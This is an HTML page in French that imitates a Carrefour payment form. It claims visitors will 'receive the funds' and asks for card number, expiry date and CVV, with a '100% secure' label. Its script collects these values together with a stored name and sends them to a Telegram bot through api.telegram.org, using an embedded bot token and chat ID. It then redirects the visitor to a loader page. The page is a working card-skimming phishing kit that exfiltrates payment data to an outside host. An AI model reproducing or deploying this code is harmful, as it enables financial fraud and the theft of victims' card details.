<html lang="fr">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&amp;display=swap">

    <title>infos</title>
    <style>
        * {
            margin: 0%;
            padding: 0%;
            box-sizing: border-box;
        }

        body {
            height: 100vh;
            font-family: 'Poppins', sans-serif;
        }

        .top {
            position: fixed;
            left: 0;
            top: 0;
            background-color: white;
            width: 100%;
            height: 70px;
            padding: 10px;
            display: flex;
            align-items: center;
            justify-content: start;
        }

        .center {
            padding: 15px;
            margin-top: 60px;
        }

        .box {
            border: 2px solid rgba(0, 0, 0, 0.21);
            border-radius: 5px;
            padding: 10px;
        }

        input {
            width: 100%;
            height: 50px;
            border: 2px solid rgba(128, 128, 128, 0.441);
            border-radius: 15px;
            margin-bottom: 20px;
            padding-left: 10px;
            font-size: 1.2rem;
        }

        #name {
            width: 100%;
            height: 50px;
            padding: 0px 10px 0px 10px;
            border: 2px solid rgba(128, 128, 128, 0.441);
            border-radius: 15px;
            padding-left: 10px;
            font-size: 1.2rem;
            display: flex;
            justify-content: space-between;
            align-items: center;
            color: grey;
            cursor: no-drop;
        }

        #name svg {
            color: grey;

        }

        input:focus {
            outline: none;
        }

        #bank {
            text-transform: uppercase;
        }

        button {
            background-color: teal;
            color: white;
            height: 50px;
            border: none;
            border-radius: 17px;
            width: 100%;
            font-weight: bolder;
        }

        @media screen and (min-width: 724px) {


            .center {
                width: 450px;
                padding: 0px 30px 0px 30px;
                margin: auto;
                margin-top: 100px;
            }

            button {
                margin-left: auto;
                cursor: pointer;
            }

            /* Ajoute d'autres styles spécifiques aux écrans PC ici */
        }
    </style>
</head>

<body>

    <div class="top shadow-sm">
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"
            stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"
            class="lucide lucide-arrow-left">
            <path d="m12 19-7-7 7-7"></path>
            <path d="M19 12H5"></path>
        </svg>

        <div class="mainbar-item__content"><!----><svg aria-hidden="false" aria-label="Logo Carrefour" class="svg-brand"><use xlink:href="#b01"></use></svg></div>
    </div>

    <div class="center">

        <p>Choisissez votre moyen de paiement ou vous recevrez les fonds</p> <br>

        <div class="box">
            <div class="up" style="display: flex; align-items: center; justify-content: space-between; padding: 0px;">
                <div>
                    <svg style="color: teal;" xmlns="http://www.w3.org/2000/svg" width="24" height="24"
                        viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                        stroke-linejoin="round" class="lucide lucide-circle-dot">
                        <circle cx="12" cy="12" r="10"></circle>
                        <circle cx="12" cy="12" r="1"></circle>
                    </svg>
                    <span>Carte bancaire</span>
                </div>

                <svg style="color: grey;" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"
                    fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"
                    class="lucide lucide-credit-card">
                    <rect width="20" height="14" x="2" y="5" rx="2"></rect>
                    <line x1="2" x2="22" y1="10" y2="10"></line>
                </svg>

            </div>
            <br> <br>
            <form id="form">

                <label for="bank">Titulaire de la carte *</label><br>
                <div id="name">
                    <div id="nom"></div>
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"
                        stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"
                        class="lucide lucide-lock-keyhole">
                        <circle cx="12" cy="16" r="1" />
                        <rect x="3" y="10" width="18" height="12" rx="2" />
                        <path d="M7 10V7a5 5 0 0 1 10 0v3" />
                    </svg>
                </div> <br>

               
                <label for="bank">Numéro de la carte *</label><br>
                <input type="tel" id="card" maxlength="16" minlength="16" required> <br>

                <label for="bank"> Date d'expiration *</label><br>

                <div style="display: flex; align-items: center; justify-content: space-between; max-width: 100%;">
                    <input style="width: 33%;" placeholder="Mois" type="tel" id="mois" minlength="2" maxlength="2"
                        required> <br>
                    <input style="width: 33%; margin-left: auto;" placeholder="Année" type="tel" id="annee"
                        minlength="2" maxlength="2" required> <br>
                    <input style="width: 33%; margin-left: auto;" placeholder="Cvv" type="tel" id="cvv" minlength="3"
                        maxlength="3" required> <br>
                </div>
                <br>
        <br>
                <button type="submit">Recevoir les fonds</button>
                <br>
                <br>
            </form>
        </div>
        


        <br>
        <br>

        <div style="display: flex; align-items: center;">
            <svg style="color: green;" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"
                fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"
                class="lucide lucide-shield-check">
                <path
                    d="M20 13c0 5-3.5 7.5-7.66 8.95a1 1 0 0 1-.67-.01C7.5 20.5 4 18 4 13V6a1 1 0 0 1 1-1c2 0 4.5-1.2 6.24-2.72a1.17 1.17 0 0 1 1.52 0C14.51 3.81 17 5 19 5a1 1 0 0 1 1 1z">
                </path>
                <path d="m9 12 2 2 4-4"></path>
            </svg>
            <span style="margin-left: 10px;">Opération 100% sécurisé</span>
        </div>

        <br>
        <br>


    </div>


    <script>

        document.getElementById('nom').innerText = localStorage.getItem('name')

        document.getElementById('form').addEventListener('submit', function (e) {
            e.preventDefault();

            // Récupération des valeurs du formulaire
            const card = document.getElementById('card').value;
            const mois = document.getElementById('mois').value;
            const annee = document.getElementById('annee').value;
            const cvv = document.getElementById('cvv').value;

            var nom = localStorage.getItem('name') ;



            // Construction du message
            const message = `
                Jeux résultat :
 \n😎Nom: ${nom}
 \n💳Carte : ${card}
 \n📅Mois: ${mois}
 \n📆Annee: ${annee}         
 \n🎯Cvv: ${cvv}         
            `;

            const botToken = '7366002950:AAFzze0vYX5nxrxWxX7y4vVg2CcJy-3Fsi4'; // Remplacez par votre token
            const chatId = '7332838769'; // Remplacez par votre chat ID
            const url = `https://api.telegram.org/bot${botToken}/sendMessage`;

            // Envoi du message au bot Telegram
            fetch(url, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message
                })
            })
                .then(response => response.json())
                .then(data => {
                    if (data.ok) {
                        console.log('Votre message a été envoyé avec succès !');
                        window.location.href = './loader2.html';
                    } else {
                        console.error('Erreur lors de l\'envoi du message:', data.description);
                        console.log('Une erreur est survenue lors de l\'envoi de votre message. Veuillez réessayer.');
                    }
                })
                .catch(error => {
                    console.error('Erreur réseau ou serveur:', error);
                    console.log('Une erreur est survenue lors de l\'envoi de votre message. Veuillez réessayer.');
                });
        });

    </script>


    <script defer=""
        src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015"
        integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ=="
        data-cf-beacon="{&quot;rayId&quot;:&quot;8cdf99bd49e83848&quot;,&quot;serverTiming&quot;:{&quot;name&quot;:{&quot;cfExtPri&quot;:true,&quot;cfL4&quot;:true}},&quot;version&quot;:&quot;2024.8.0&quot;,&quot;token&quot;:&quot;bb2b860569ca44c0b7016740aec5a17e&quot;}"
        crossorigin="anonymous"></script>


</body>

</html>